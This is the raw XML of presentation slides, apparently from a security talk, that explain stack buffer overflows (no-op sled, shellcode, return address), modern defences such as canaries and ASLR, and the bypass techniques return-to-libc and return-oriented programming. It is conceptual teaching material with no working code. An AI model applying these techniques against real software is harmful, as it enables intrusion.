                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2106719825"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3540512">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3168807671"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1018314">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="641567033"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>No-op sled</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="00B050"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Shellcode</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Address of No Op</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3666078861"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3287619-1205-1B53-D769-09292FB5DF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8876413" y="4303150"/>
            <a:ext cx="3078750"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Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F41530-64E1-0CE6-2711-03351CF79D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611045" y="4210224"/>
            <a:ext cx="2436038"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mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arrow: Curved Down 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CC73F7F-0D19-110A-805D-2A0A5DC8CE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2970838" y="2493582"/>
            <a:ext cx="5599708" cy="8331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5089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3" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DE2AC1-69A9-6FAC-BBFC-FFA7FFED7561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="919975" y="3559097"/>
          <a:ext cx="10577576" cy="579120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1017548">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4104290975"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2538253">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="88160365"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2462949">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2106719825"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3540512">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3168807671"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1018314">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="641567033"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>No-op sled</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="00B050"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Shellcode</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Address of No Op</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3666078861"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3287619-1205-1B53-D769-09292FB5DF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8876413" y="4303150"/>
            <a:ext cx="3078750"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Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F41530-64E1-0CE6-2711-03351CF79D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611045" y="4210224"/>
            <a:ext cx="2436038"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mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arrow: Curved Down 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CC73F7F-0D19-110A-805D-2A0A5DC8CE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2970838" y="2493582"/>
            <a:ext cx="5599708" cy="8331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854525C-518B-7F77-CC57-C952E29B8F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2292399" y="1790194"/>
            <a:ext cx="6815751" cy="381370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mr-IN" sz="4000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45168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does traditional BOF no longer work?</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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stack canaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Address Space Layout Randomization (ASLR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>No Stack Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Compiler warnings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hardware changes to prevent execution of code on the stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318955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Object Programing (ROP)</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vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Allows attacker to hijack program control flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Attacker can execute arbitrary code with "gadgets"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Gadgets machine instruction sequences that are presented in the machine's memory when the code is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Allows attacker to bypass ASLR and no stack execution protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298959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Object Programing (ROP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1CEAC8-B6B4-630B-C77D-6CD7AA2D494D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1379963" y="25647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CB34BECD-4ACC-5D2B-A20F-4D0DE4304394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446244" y="258924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660A7A60-D0D3-337E-D975-D62DF386295A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080796" y="2414296"/>
            <a:ext cx="25659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Hijack code already in memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158F18AA-E6EC-71DD-7BB1-AC36B4E8667D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8327571" y="2414296"/>
            <a:ext cx="256591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These are called "gadgets"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="ctr">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF89841-EC58-5EA0-3EA2-586F5521DDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4204855" y="1901725"/>
            <a:ext cx="3782289" cy="3903141"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42142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err="1"/>
              <a:t>Whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a: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5558880" cy="4043765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>I am </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>groot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Senior Security Engineer at Health Equity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Master of Computer Science (Cybersecurity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Offensive Security Certified Professional (OSCP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>HackTheBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> member since 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D21E40-6889-10F0-2A7D-F70F2F62CAA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6832409" y="3641908"/>
            <a:ext cx="4667800" cy="2339840"/>
            <a:chOff x="6907259" y="3012934"/>
            <a:chExt cx="4190403" cy="1935889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 5" descr="Logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C64400F7-6906-6A79-BF93-46C59E7BFC54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6907259" y="3207467"/>
              <a:ext cx="1991337" cy="1546819"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB920E75-E255-9515-C877-90021F87570E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9164767" y="3012934"/>
              <a:ext cx="1932895" cy="1935889"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25600848-09A4-E03D-5F1B-43AAF4E9CB0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6976303" y="1117261"/>
            <a:ext cx="4306676" cy="2077160"/>
            <a:chOff x="7007405" y="907322"/>
            <a:chExt cx="4086339" cy="2003715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1B7D46-3AFB-FBEC-5EA4-1592177A5EB1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect l="28112" t="204" r="25703" b="719"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7007405" y="907322"/>
              <a:ext cx="1670473" cy="2001448"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B76B50-6D97-25DC-58EC-44C9E024103F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9162387" y="908640"/>
              <a:ext cx="1931357" cy="2002397"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7761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to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Libc</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000"/>
              <a:t>Attacker hijacks program control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>Attacker chooses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>library function (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t> function)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>Attacker overwrites the return address with its entry location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>Attacker executes arbitrary code by chaining function calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
